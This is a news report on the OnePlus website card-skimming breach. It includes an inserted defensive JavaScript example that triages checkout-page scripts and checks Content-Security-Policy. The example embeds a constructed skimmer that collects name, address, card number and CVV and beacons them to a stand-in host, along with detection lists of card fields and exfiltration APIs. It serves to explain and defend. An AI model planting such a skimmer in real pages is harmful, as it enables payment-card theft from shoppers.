OnePlus recently received reports from customers that fraudulent purchases were appearing on their credit card statements after making a purchase from the official OnePlus website. As we reported a few days ago, the complaints came from numerous sources including Reddit and OnePlus' official forums.
Though we noted at the time that the problem didn't appear to be widespread (a OnePlus forum poll had found only 63 affected customers), it has turned out to be far broader. After investigating, OnePlus confirmed in a separate forum post that "up to [40,000] users at oneplus.net may be affected" by the credit card breach.
In the post, a OnePlus staff member explained the situation:
"One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered.
- The malicious script operated intermittently, capturing and sending data directly from the user's browser. It has since been eliminated.
- We have quarantined the infected server and reinforced all relevant system structures."
While OnePlus has so far said only that credit card information was stolen, the exposure may go further than that. A script that captures the checkout submission sees every field in that request, not just the card fields, so names and postal addresses may also have been exposed: "all the data from the first page of the checkout gets submitted in the same request," according to Andrew Mabbitt, founder of Fidus.
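The statement above describes a client-side skimmer: script injected into the payment page that reads the form as the customer types or submits it and sends the data out of the browser, and Fidus' point is that such a script gets name and address fields for free because they travel in the same request. The following is an added example, not code from OnePlus, Fidus or this article. It shows a heuristic triage a practitioner could run over a copy of a checkout page's HTML (flag inline scripts that reference card fields and call an API able to send data off-site, and external scripts from hosts outside an allow-list), plus a check of whether a Content-Security-Policy header would have blocked the exfiltration channel, which goes slightly beyond the article by naming a control that would have contained the incident. All hostnames, field names and the embedded skimmer snippet are constructed for the example; the field-name and API lists are assumptions that must be tuned to the real page.

```javascript
// Added example: heuristic skimmer triage for a checkout page plus a CSP exfiltration check.
// Not OnePlus or Fidus code; hosts, field names and the sample page are constructed.

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Input names a skimmer has to touch to read card data (assumption; page-specific).
const CARD_FIELDS = ['cardnumber', 'card_number', 'ccnum', 'cvv', 'cvc', 'expiry'];
// Browser APIs that can send captured data to another host.
const EXFIL_APIS = ['new Image(', 'fetch(', 'XMLHttpRequest', 'sendBeacon(', 'WebSocket('];

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (e) { return null; }
}

// Pull every <script> out of the page: external ones keep their src, inline ones their body.
function extractScripts(html) {
  const out = [];
  let m;
  while ((m = SCRIPT_RE.exec(html)) !== null) {
    const srcMatch = SRC_RE.exec(m[1]);
    out.push({ src: srcMatch ? srcMatch[1] : null, body: m[2] });
  }
  return out;
}

// Flag (a) external scripts served from a host not on the allow-list and
// (b) inline scripts that both reference card fields and use an exfiltration-capable API.
function flagSuspiciousScripts(html, allowedHosts) {
  const allowed = new Set(allowedHosts.map(h => h.toLowerCase()));
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src) {
      const h = hostOf(s.src);
      if (h && !allowed.has(h)) findings.push({ kind: 'external', host: h });
      continue;
    }
    const lower = s.body.toLowerCase();
    const touchesCard = CARD_FIELDS.some(f => lower.includes(f));
    const apis = EXFIL_APIS.filter(a => s.body.includes(a));
    const hosts = [...s.body.matchAll(URL_RE)]
      .map(x => x[1].toLowerCase())
      .filter(h => !allowed.has(h));
    if (touchesCard && apis.length > 0) findings.push({ kind: 'inline', apis, hosts });
  }
  return findings;
}

// Parse a CSP header into { directive: [sources] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Would this CSP let a page on selfHost send data to host over the given channel?
// channel: 'img' (Image beacon), 'connect' (fetch/XHR/sendBeacon/WebSocket) or 'form' (form-action).
function cspAllowsExfil(header, channel, host, selfHost) {
  const policy = parseCsp(header);
  const name = { img: 'img-src', connect: 'connect-src', form: 'form-action' }[channel];
  let sources = policy[name];
  // img-src and connect-src fall back to default-src; form-action does not.
  if (!sources && channel !== 'form') sources = policy['default-src'];
  if (!sources) return true; // no governing directive: the request is allowed
  return sources.some(src => {
    const s = src.toLowerCase();
    if (s === "'none'") return false;
    if (s === '*') return true;
    if (s === "'self'") return host === selfHost;
    const h = s.replace(/^[a-z]+:\/\//, '').split('/')[0].replace(/:(\d+|\*)$/, '');
    if (h.startsWith('*.')) return host.endsWith(h.slice(1));
    return h === host;
  });
}

// Constructed sample page: the shop's own script plus an injected inline skimmer modelled on
// the behaviour described above. Note it harvests name and address alongside the card fields.
const SAMPLE_CHECKOUT_HTML = `
<form id="checkout">
  <input name="fullname"><input name="address"><input name="cardnumber"><input name="cvv">
</form>
<script src="https://cdn.example-shop.test/checkout.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {};
  ['fullname', 'address', 'cardnumber', 'cvv'].forEach(function (n) {
    d[n] = document.getElementsByName(n)[0].value;
  });
  new Image().src = 'https://stats.skimmer-host.test/c?d=' + btoa(JSON.stringify(d));
});
</script>`;

console.log(flagSuspiciousScripts(SAMPLE_CHECKOUT_HTML, ['cdn.example-shop.test']));
console.log(cspAllowsExfil("default-src 'self'", 'img', 'stats.skimmer-host.test', 'shop.example'));
```

The triage is a heuristic, not a proof of absence: a skimmer can obfuscate field names and build its destination URL at runtime, so a clean result only means nothing matched. The CSP check is the more robust angle, since a policy whose `img-src` and `connect-src` (or `default-src`) list only the shop's own hosts stops the exfiltration regardless of how the script is written.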
OnePlus says the breach affected only customers who entered a credit card on the OnePlus store between "mid-November and January 11, 2018." Customers who paid via PayPal, with a previously saved credit card, or with a credit card through PayPal should not have been affected, which is consistent with the script capturing card details only as they were typed into the payment page.
"We are in contact with potentially affected customers. We are working with our providers and local authorities to better address the incident," a staff member said. "We are also working with our current payment providers to implement a more secure credit card payment method, as well as conducting an in-depth security audit. All these measures will help us prevent such incidents from happening in the future."
Moving forward, OnePlus recommends that all of its customers check their credit card statements for fraudulent purchases and report any suspicious transactions to their banks. The company has also suspended all credit card transactions on its site until the issue has been resolved.